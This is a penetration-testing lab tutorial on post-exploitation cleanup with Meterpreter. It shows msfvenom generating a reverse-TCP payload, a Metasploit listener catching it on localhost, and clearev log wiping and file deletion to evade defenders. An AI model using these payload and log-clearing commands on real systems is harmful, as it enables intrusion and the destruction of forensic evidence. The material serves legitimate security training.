Introduction
In the field of penetration testing and red teaming, gaining access to a target system is only part of the mission. What you do after gaining access, and just as importantly, before you disconnect, is critical. This phase is known as post-exploitation. A crucial component of post-exploitation is cleanup: the process of removing all traces of your presence from the compromised system.
Leaving behind tools, logs, or system changes can alert system administrators and blue teams to your activities, leading to the failure of the engagement and the patching of the vulnerabilities you used. Meterpreter, a powerful payload within the Metasploit Framework, provides several tools to assist in this cleanup process.
In this lab, you will learn the fundamental steps of cleaning up a system after an engagement using Meterpreter. You will practice gaining a session, clearing event logs, deleting files, and understanding the importance of leaving no trace.
Gain a Meterpreter session on a target
In this step, before we can practice cleaning up a system, we first need to gain access to it. We will simulate this by creating a payload with msfvenom, setting up a listener in the Metasploit Framework, and then "executing" the payload on our own machine to get a Meterpreter session on localhost.
First, open a terminal and use msfvenom to generate a Linux Meterpreter payload. This command will create an executable file named payload.elf in your current directory (~/project).
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/payload.elf
You should see output indicating the payload was successfully generated:
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, choosing x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 120 bytes
Final size of elf file: 240 bytes
Saved as: ~/project/payload.elf
Next, start the Metasploit Framework console. The -q flag makes it start quietly without showing the banner.
msfconsole -q
Once you are in the msfconsole prompt, you need to configure a listener to catch the connection from the payload. We will use the exploit/multi/handler module.
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit -j
The exploit -j command starts the listener as a background job, so you can still use the console. You will see a message that the handler has started.
Now, open a new terminal tab by clicking the + icon in the terminal window. In this new tab, make the payload executable and run it.
chmod +x ~/project/payload.elf
~/project/payload.elf
Switch back to your first terminal tab with msfconsole. You should see a message indicating that a Meterpreter session has been opened.
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36978) at 2023-10-27 10:30:00 -0400
To interact with this new session, use the sessions command.
sessions -i 1
Your prompt should change to meterpreter >, indicating you are now in control of the session.
Use the clearev command to clear event logs
In this step, we will discuss one of the most important cleanup commands in Meterpreter: clearev. A primary goal of cleanup is to remove evidence of your activity from system logs. On Windows systems, these logs (Application, System, and Security) are a prime source of information for forensic investigators.
The clearev command is designed specifically to clear these three main event logs on a Windows target.
Important Note: Our current Meterpreter session is on a Linux system. The clearev command will not work here and will produce an error. We are demonstrating its usage for educational purposes, as it is a critical tool when your target is Windows.
Inside your meterpreter > prompt, type the command to see the result on our Linux session:
meterpreter > clearev
You will see an error message because the command is not implemented for Linux systems.
[-] core_channel_open: Operation failed: The "stdapi_sys_eventlog_open" command is not supported by this session.
However, if you were on a Meterpreter session on a Windows machine, the output would look like this, indicating success:
[*] Wiping 3 records from Application...
[*] Wiping 3 records from System...
[*] Wiping 3 records from Security...
Understanding which tools work on which operating systems is a key skill for a penetration tester. Even though we couldn't execute it successfully, you now know the primary command for clearing event logs on a Windows target.
Manually delete any uploaded files or tools
In this step, you will learn to manually remove files that you may have uploaded or created on the target system. Automated scripts are useful, but you should always perform a manual check to ensure no tools, scripts, or payloads are left behind.
In our current scenario, the payload.elf file we created in Step 1 is now on the "compromised" system. We must delete it to cover our tracks. We can do this directly from our Meterpreter session.
First, use the ls command within Meterpreter to list the files in the current directory of the target. You should see your payload file.
meterpreter > ls
The output will list the files in /home/labex/project:
Listing: /home/labex/project
============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100755/rwxr-xr-x 240 fil 2023-10-27 10:28:00 -0400 payload.elf
...
Now, use the rm command in Meterpreter to delete the file.
meterpreter > rm payload.elf
You should see a confirmation message:
[*] rm: Removed /home/labex/project/payload.elf
To confirm that the file is gone, run the ls command again. The payload.elf file should no longer be listed. This is a critical step in ensuring you leave the system as you found it.
Revert any system changes made during post-exploitation
In this step, we'll address another aspect of cleanup: reverting system changes. During post-exploitation, you might add user accounts, change file permissions, or create scheduled tasks for persistence. All of these changes must be undone before you leave.
We will simulate this by creating a temporary file to represent a system modification, and then we will remove it.
From your meterpreter > prompt, let's create a file named temp_change.txt. We can do this by using Meterpreter's execute command to run the touch command on the target system.
meterpreter > execute -f touch -a "/home/labex/project/temp_change.txt"
This command executes touch with the argument /home/labex/project/temp_change.txt. You can verify its creation with ls.
meterpreter > ls
Now, as part of our cleanup, we must remove this file. Use the rm command just as you did in the previous step.
meterpreter > rm temp_change.txt
This is a very simple example, but the principle applies to more complex changes. If you added a user, you must delete that user. If you modified a configuration file, you must restore it from a backup or revert the changes manually.
Finally, our cleanup on the target is complete. We can now exit the Meterpreter session and then exit the Metasploit console.
meterpreter > exit
[*] Shutting down Meterpreter...
msf6 exploit(multi/handler) > exit
This will return you to your regular terminal prompt.
Discuss the importance of leaving no trace
This final step is a conceptual review of why cleanup is one of the most critical phases of a professional security engagement. There are no commands to run here; the goal is to understand the strategic importance of what you've just practiced.
Key Reasons for Thorough Cleanup:
Operational Security (OPSEC): The primary goal is to remain undetected. Any artifact you leave behind—a file, a log entry, a running process—is a clue for blue teams and incident responders. Being detected can burn your entire operation, including the tools and infrastructure you used.
Professionalism and Integrity: In a professional penetration test, you are hired to assess security, not to damage the client's systems. Leaving a system in a modified state is unprofessional. Restoring the system to its original state demonstrates care and respect for the client's environment.
Preventing Unintended Damage: Tools or scripts left behind can cause system instability. Worse, a backdoor you created for access could be discovered and used by a malicious actor, making the system less secure than when you started. Your responsibility is to improve security, not create new vulnerabilities.
Maintaining Future Access: In a red team engagement that might span weeks or months, cleaning up after each small action ensures that your long-term access is not discovered prematurely. If you are detected, defenders will patch the vulnerabilities and close the access points you were using.
In summary, effective cleanup is not just about deleting files. It's a mindset that prioritizes stealth, professionalism, and the core mission of the engagement. It separates amateur hackers from professional security testers.
Summary
In this lab, you have walked through the essential process of cleaning up a compromised system using Meterpreter. This is a fundamental skill for any ethical hacker or penetration tester.
You successfully:
- Gained a Meterpreter session by creating and executing a payload.
- Learned about the
clearevcommand and its specific use case for clearing event logs on Windows systems. - Practiced manually deleting files from a target system using the Meterpreter
rmcommand. - Simulated reverting system changes by creating and removing a temporary file.
- Reflected on the critical importance of cleanup for maintaining operational security and professionalism.
By mastering these techniques, you can ensure your security engagements are not only effective but also responsible, leaving the target environment as you found it and minimizing the risk of detection.
